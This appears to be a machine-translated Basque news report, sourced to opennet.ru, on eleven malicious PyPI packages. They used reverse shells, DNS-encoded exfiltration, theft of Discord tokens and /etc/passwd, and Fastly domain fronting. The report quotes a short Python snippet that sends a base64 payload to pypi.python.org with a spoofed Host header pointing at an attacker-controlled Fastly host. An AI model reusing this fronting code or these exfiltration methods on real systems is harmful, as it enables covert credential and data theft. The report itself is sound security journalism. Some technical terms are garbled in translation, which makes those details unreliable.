PyPI (Python Package Index) direktorioan, kode gaiztoa zuten 11 pakete identifikatu ziren. Arazoak identifikatu aurretik, paketeak guztira 38 mila aldiz deskargatu ziren. Detektatu diren pakete gaiztoak nabarmenak dira erasotzaileen zerbitzariekin komunikazio-kanalak ezkutatzeko metodo sofistikatuak erabiltzeagatik.
- importantpackage (6305 deskarga), important-package (12897) - kanpoko zerbitzari baterako konexio bat ezarri zuen pypi.python.org-era konektatzeko moduan, sistemarako shell sarbidea emateko (alderantzizko shell) eta trevorc2 programa erabili zuen ezkutatzeko. komunikazio kanala.
- pptest (10001), ipboards (946) - DNS erabili zuen komunikazio-kanal gisa sistemari buruzko informazioa transmititzeko (lehen paketean ostalari-izena, lan-direktorioa, barneko eta kanpoko IP-a, bigarrenean - erabiltzailearen izena eta ostalariaren izena) .
- owlmoon (3285), DiscordSafety (557), yiffparty (1859) - sisteman Discord zerbitzuaren tokena identifikatu eta kanpoko ostalari batera bidali zuen.
- trrfab (287) - /etc/passwd, /etc/hosts, /home-ren identifikatzailea, ostalari-izena eta edukia bidali dizkio kanpoko ostalariari.
- 10Cent10 (490) - alderantzizko shell konexioa ezarri zuen kanpoko ostalari batekin.
- yandex-yt (4183) - sistema arriskutsuari buruzko mezu bat bistaratu zuen eta orrialde batera birbideratu zuen nda.ya.ru (api.ya.cc) bidez egindako ekintza gehiagori buruzko informazio gehigarriarekin.
Aipagarria da importantpackage eta important-package paketeetan erabiltzen den kanpoko ostalari atzitzeko metodoa, zeinak PyPI direktorioan erabiltzen den Fastly edukia bidaltzeko sarea erabiltzen zuten beren jarduera ezkutatzeko. Izan ere, eskaerak pypi.python.org zerbitzarira bidali ziren (HTTPS eskaeraren barruan SNI-n python.org izena zehaztea barne), baina HTTP "Ostalari" goiburuak erasotzaileek kontrolatutako zerbitzariaren izena zuen (sec. aurrera.io. global.prod.fastly.net). Edukiak banatzeko sareak zerbitzari erasotzaileari antzeko eskaera bidali zion, datuak igortzerakoan pypi.python.org-erako TLS konexioaren parametroak erabiliz.
PyPI azpiegitura Fastly edukiak bidaltzeko sareak elikatzen du, zeinak Barnish proxy gardena erabiltzen du eskaera tipikoak gordetzeko, eta TLS ziurtagirien prozesamendua ere erabiltzen du CDN mailan, amaierako zerbitzarietan baino, HTTPS eskaerak proxy baten bidez bidaltzeko. Xede-ostalaria edozein dela ere, eskaerak proxy-ra bidaltzen dira, eta horrek HTTP "Ostalari" goiburua erabiliz nahi den ostalaria zehazten du, eta ostalariaren domeinu-izenak Fastly bezero guztientzat ohikoak diren CDN karga-balantzailearen IP helbideetara lotzen dira.
Erasotzaileen zerbitzariak CDN Fastly-n ere erregistratzen du, eta horrek denei doako planak eskaintzen dizkie eta erregistro anonimoa ere ahalbidetzen du. Azpimarratzekoa da biktimari eskaerak bidaltzeko "alderantzizko shell" bat sortzean, eskema bat ere erabiltzen dela, baina erasotzailearen ostalariaren aldetik hasita. Kanpotik begiratuta, erasotzaileen zerbitzariarekiko elkarrekintza PyPI direktorioaren bidezko saio bat dirudi, PyPI TLS ziurtagiria erabiliz enkriptatutakoa. Antzeko teknika bat, "domeinu-fronting" izenez ezagutzen dena, aktiboki erabiltzen zen ostalari-izena ezkutatzeko blokeoa saihestuz gero, CDN sare batzuetan HTTPS atzitzeko ematen den gaitasuna erabiliz, SNIn fikziozko ostalari bat adieraziz eta benetan igortzen zuen izena. eskatutako ostalari HTTP Host goiburuan TLS saio baten barruan.
Jarduera gaiztoak ezkutatzeko, TrevorC2 paketea zerbitzariarekin elkarreragina ohiko web nabigazioaren antzekoa izan dadin ere erabili zen; adibidez, eskaera gaiztoak bidali ziren irudia deskargatzeko moduan "https://pypi.python.org/images/". guid="guid parametroan informazioa kodetzen duena. url = "https://pypi.python.org" + "/images" + "?" + "guid=" + b64_payload r = request.Request (url, headers = {'Ostalari': "psec.forward.io.global.prod.fastly.net"})
pptest eta ipboards paketeek sareko jarduera ezkutatzeko beste ikuspegi bat erabili zuten, DNS zerbitzariari egindako kontsultetan informazio erabilgarria kodetzean oinarrituta. Malwareak informazioa transmititzen du "nu4timjagq4fimbuhe.example.com" bezalako DNS eskaerak eginez, zeinetan kontrol-zerbitzariari helarazitako datuak azpidomeinuaren izenean base64 formatuan kodetzen diren. Erasotzaileak mezu hauek jasotzen ditu example.com domeinuko DNS zerbitzaria kontrolatuz.
Iturria: opennet.ru